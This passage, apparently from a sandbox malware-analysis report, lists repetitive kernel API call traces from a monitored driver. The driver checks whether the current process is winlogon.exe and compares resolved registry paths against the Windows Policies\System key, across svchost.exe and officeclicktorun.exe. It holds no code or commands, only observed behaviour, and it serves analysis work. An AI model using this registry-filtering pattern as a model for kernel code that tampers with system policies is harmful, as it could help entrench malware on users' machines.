| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fa150, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003a763520 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fa150, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a7862c0 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a7862c0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Control Panel\International, DestinationString_out = \REGISTRY\USER\.DEFAULT\Control Panel\International |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7862c0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Control Panel\International, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -16 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Control Panel\International, DestinationString_out = \REGISTRY\USER\.DEFAULT\Control Panel\International |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \Control Panel\International, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -16 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fa150, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fa150, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fa150, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x110, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10e, ret_val_ptr_out = 0xffffe0003a769010 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x10e, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E5217668-D921-4907-8CE1-276EABA44515} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #190 (length: 172, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 172 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 |
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba0fcea0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000293450d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fcea0, ret_val_out = 1 |
